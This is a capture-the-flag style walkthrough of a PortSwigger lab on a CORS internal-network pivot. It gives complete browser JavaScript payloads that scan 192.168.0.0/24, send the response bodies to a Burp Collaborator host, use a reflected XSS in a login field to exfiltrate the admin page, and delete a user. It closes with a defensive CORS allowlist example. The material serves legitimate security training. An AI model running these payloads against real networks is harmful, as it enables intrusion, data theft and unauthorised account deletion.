# CORS vulnerability with internal network pivot attack
## 1. Find the IP on the internal network
```htmlembedded=
<html>
<script>
// Burp Collaborator endpoint that receives the scan results
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
// Probe every host in 192.168.0.0/24 on port 8080 from the victim's browser;
// `let` gives each iteration its own `i`, so each callback reports the right host
for (let i = 0; i < 256; i++) {
  fetch('http://192.168.0.' + i + ':8080')
    .then(response => response.text())
    .then(text => {
      // Only hosts whose response is readable cross-origin (permissive CORS) get here;
      // forward the host and the page body to Collaborator
      fetch(collaboratorURL + '?ip=' + 'http://192.168.0.' + i + '&code=' + encodeURIComponent(text))
    })
    .catch(() => {})  // unreachable hosts and CORS-blocked reads are ignored
}
</script>
</html>
```
Paste into the Exploit Server -> Store -> Deliver exploit to victim
This finds the IP 192.168.0.61 together with the source of its login page:

```htmlembedded=
<!DOCTYPE html>
<html>
<head>
<link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
<link href=/resources/css/labs.css rel=stylesheet>
<title>CORS vulnerability with internal network pivot attack</title>
</head>
<body>
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class='academyLabBanner'>
<div class=container>
<div class=logo></div>
<div class=title-container>
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id='exploit-link' class='button' target='_blank' href='http://exploit-0a350035044985a380c6488301bf00dd.exploit-server.net'>Go to exploit server</a>
<a class=link-back href='https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack'>
Back to lab description
<svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
<g>
<polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
<polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
</g>
</svg>
</a>
</div>
<div class='widgetcontainer-lab-status is-notsolved'>
<span>LAB</span>
<p>Not solved</p>
<span class=lab-status-icon></span>
</div>
</div>
</div>
</section>
</div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href=/>Home</a><p>|</p>
<a href="/my-account">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<h1>Login</h1>
<section>
<form class=login-form method=POST action="/login">
<input required type="hidden" name="csrf" value="DJv2phmih2CeooESDPNnQaTAGiT6kJkA">
<label>Username</label>
<input required type=username name="username" autofocus>
<label>Password</label>
<input required type=password name="password">
<button class=button type=submit> Log in </button>
</form>
</section>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
</body>
</html>
```
Extract the CSRF token with a regex

## 2. Check whether the username field is vulnerable to XSS
```htmlembedded=
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'   // internal host found in step 1
fetch(url)
  .then(response => response.text())
  .then(text => {
    // Payload: close the value attribute and inject an image that calls back to Collaborator
    xss = '"><img src=' + collaboratorURL + '?foundXSS=1>';
    // match() returns an array; [1] is the capture group holding the CSRF token
    csrf = text.match(/csrf" value="([^"]+)"/)[1];
    login_path = '/login?username=' + encodeURIComponent(xss) + '&password=random&csrf=' + csrf;
    location = url + login_path;
  })
  .catch(() => {})  // no token in the page (or fetch blocked): do nothing
</script>
</html>
```
Paste into the Exploit Server -> Store -> Deliver exploit to victim

-> The username field is vulnerable to XSS
## 3. Use the XSS to retrieve the admin page source
```htmlembedded=
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
  .then(response => response.text())
  .then(text => {
    // Payload: inject an iframe that loads /admin and, once loaded, sends its body HTML to Collaborator
    xss = '"><iframe src=/admin onload="new Image().src=\'' + collaboratorURL + '?code=\'+encodeURIComponent(this.contentWindow.document.body.innerHTML)">';
    // [1] selects the captured CSRF token instead of the whole match array
    csrf = text.match(/csrf" value="([^"]+)"/)[1];
    login_path = '/login?username=' + encodeURIComponent(xss) + '&password=random&csrf=' + csrf;
    location = url + login_path;
  })
  .catch(() => {})
</script>
</html>
```
Paste into the Exploit Server -> Store -> Deliver exploit to victim

The admin page source is retrieved:
```htmlembedded=
<script src="/resources/labheader/js/labHeader.js"></script>
<div id="academyLabHeader">
<section class="academyLabBanner">
<div class="container">
<div class="logo"></div>
<div class="title-container">
<h2>CORS vulnerability with internal network pivot attack</h2>
<a id="exploit-link" class="button" target="_blank" href="http://exploit-0a570057046a88af8136a3dc013f0019.exploit-server.net">Go to exploit server</a>
<a class="link-back" href="https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack">
Back to lab description
<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 28 30" enable-background="new 0 0 28 30" xml:space="preserve" title="back-arrow">
<g>
<polygon points="1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15"></polygon>
<polygon points="14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15"></polygon>
</g>
</svg>
</a>
</div>
<div class="widgetcontainer-lab-status is-notsolved">
<span>LAB</span>
<p>Not solved</p>
<span class="lab-status-icon"></span>
</div>
</div>
</section></div>
<div theme="">
<section class="maincontainer">
<div class="container is-page">
<header class="navigation-header">
<section class="top-links">
<a href="/">Home</a><p>|</p>
<a href="/admin">Admin panel</a><p>|</p>
<a href="/my-account?id=administrator">My account</a><p>|</p>
</section>
</header>
<header class="notification-header">
</header>
<form style="margin-top: 1em" class="login-form" action="/admin/delete" method="POST">
<input required="" type="hidden" name="csrf" value="ueASHsgFO6MbB8TLaTjSw38sZe3Opiex">
<label>Username</label>
<input required="" type="text" name="username">
<button class="button" type="submit">Delete user</button>
</form>
</div>
</section>
<div class="footer-wrapper">
</div>
</div>
```
## 4. Use the XSS to delete the user carlos
```htmlembedded=
<html>
<script>
collaboratorURL = 'http://dvcnyp6xn7uyp5cunm7kadwxkoqfe62v.oastify.com'
url = 'http://192.168.0.61:8080'
fetch(url)
  .then(response => response.text())
  .then(text => {
    // Payload: iframe /admin and, once loaded, fill in the delete form's username field and submit it
    xss = '"><iframe src=/admin onload="var f=this.contentWindow.document.forms[0];if(f.username)f.username.value=\'carlos\',f.submit()">';
    // [1] selects the captured CSRF token instead of the whole match array
    csrf = text.match(/csrf" value="([^"]+)"/)[1];
    login_path = '/login?username=' + encodeURIComponent(xss) + '&password=random&csrf=' + csrf;
    location = url + login_path;
  })
  .catch(() => {})
</script>
</html>
```
Paste into the Exploit Server -> Store -> Deliver exploit to victim -> Solved.
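Added example, not code from the write-up or from the lab: the scan in step 1 can only read the internal hosts' response bodies because the internal application answers cross-origin requests with a permissive `Access-Control-Allow-Origin`. The code below contrasts an origin-reflecting policy, which makes that read possible, with an allowlist policy that returns no CORS headers to the exploit-server origin; the `TRUSTED_ORIGINS` set and the `intranet.example` host are assumptions.

```javascript
// Added example, not code from the write-up. Origin values below are
// constructed; only http://192.168.0.61:8080 comes from the lab.

// Weak policy: echo whatever Origin the browser sent and allow cookies
// with it. Any site the victim visits can then read internal responses.
function reflectingCorsHeaders(origin) {
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened policy: compare the full origin (scheme + host + port) against
// a fixed allowlist. Unknown origins get no CORS headers at all, so the
// browser never hands the response body to the calling script.
const TRUSTED_ORIGINS = new Set([
  'http://192.168.0.61:8080',   // the internal app's own origin (from the write-up)
  'http://intranet.example',    // constructed second trusted origin
]);

function allowlistCorsHeaders(origin, trusted = TRUSTED_ORIGINS) {
  // Browsers send the literal string "null" for sandboxed iframes and
  // file:// pages; it must never be treated as a trusted origin.
  if (typeof origin !== 'string' || origin === 'null') return {};
  let parsed;
  try {
    parsed = new URL(origin);
  } catch (e) {
    return {};                  // malformed Origin header
  }
  // URL.origin drops default ports and any path, so "http://host:80" and
  // "http://host" compare equal, and a look-alike host such as
  // "192.168.0.61.attacker.example" cannot pass the way a prefix check would let it.
  const canonical = parsed.origin;
  if (!trusted.has(canonical)) return {};
  return {
    'Access-Control-Allow-Origin': canonical,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',           // stop caches replaying one origin's answer to another
  };
}

// True when a script running at `origin` would be allowed to read a
// response carrying these headers ('*' suffices for requests without credentials).
function readableBy(headers, origin) {
  const acao = headers['Access-Control-Allow-Origin'];
  return acao === '*' || acao === origin;
}
```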